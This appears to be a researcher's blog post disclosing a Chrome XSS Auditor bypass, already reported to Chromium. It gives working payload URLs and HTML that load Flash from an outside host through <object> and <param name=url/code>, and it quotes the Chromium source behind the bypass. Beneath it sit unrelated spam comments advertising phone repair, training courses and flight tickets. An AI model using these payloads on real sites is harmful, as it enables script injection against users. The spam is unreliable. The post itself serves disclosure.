I just found an XSS Auditor bypass by accident when I read Chromium's code for the another reason.
In this short post, I'd like to share this bypass. I confirmed that it works on Chrome Canary 57.
I have already reported here: https://bugs.chromium.org/p/chromium/issues/detail?id=676992
The bypass is:
https://vulnerabledoma.in/char_test?body=%3Cobject%20allowscriptaccess=always%3E%20%3Cparam%20name=url%20value=https://l0.cm/xss.swf%3E
<object allowscriptaccess=always>Also it works:
<param name=url value=https://l0.cm/xss.swf>
https://vulnerabledoma.in/char_test?body=%3Cobject%20allowscriptaccess=always%3E%20%3Cparam%20name=code%20value=https://l0.cm/xss.swf%3E
<object allowscriptaccess=always>
<param name=code value=https://l0.cm/xss.swf>
I didn't know that Chrome supports such params until I found it in the HTMLObjectElement.cpp:
if (url.isEmpty() && urlParameter.isEmpty() &&The
(equalIgnoringCase(name, "src") || equalIgnoringCase(name, "movie") ||
equalIgnoringCase(name, "code") || equalIgnoringCase(name, "url")))
urlParameter = stripLeadingAndTrailingHTMLSpaces(p->value());
<param name="src" value="//attacker/xss.swf"> and <param name="movie" value="//attacker/xss.swf"> are blocked by XSS Auditor. But I noticed that code and url are not blocked. Using this, we can load Flash and execute the JavaScript. According to the source code's comment, it seems Chrome supports this for compatibility. But at least I confirmed it does not work on IE/Edge and Firefox. I think Chrome can remove this support :)That's it. I wrote about XSS Auditor bypass using
<param>. Thanks for reading!
To do Not Pressure OR Anything, But Have Ever This considered post there is statement PT Lampung Service this is a
ReplyDeleteService HP Bandar Lampung whose looking to do day
Service iPhone Lampung to this looking then to that is
Jasa Kursus Service HP I will try it.
Jasa Kursus Service HP They have jumping places and so that the device other kid's activity.Youtuber Lampung , Thanks ! Visit Back.
Lembaga Kursus Terbaik di Indonesia
DeleteDistributor Kuota Lampung
PT Lampung Service
Service HP Bandar Lampung
Service iPhone Lampung
Service Acer Lampung
PT Lampung Service
Great Article. Thank you for sharing! Really an awesome post for every one.
DeleteIEEE Final Year projects Project Centers in Chennai are consistently sought after. Final Year Students Projects take a shot at them to improve their aptitudes, while specialists like the enjoyment in interfering with innovation. For experts, it's an alternate ball game through and through. Smaller than expected IEEE Final Year project centers ground for all fragments of CSE & IT engineers hoping to assemble. Final Year Project Domains for IT It gives you tips and rules that is progressively critical to consider while choosing any final year project point.
JavaScript Training in Chennai
JavaScript Training in Chennai
Awesome post
ReplyDeletesuprememobiles
Nice post today gold rate
ReplyDeleteAivivu chuyên vé máy bay, tham khảo
ReplyDeletevé máy bay đi Mỹ hạng thương gia
mua vé máy bay từ mỹ về việt nam hãng eva
gia ve may bay vietjet tu han quoc ve viet nam
giá vé máy bay từ Toronto đến việt nam
khi nào có chuyến bay từ nhật về việt nam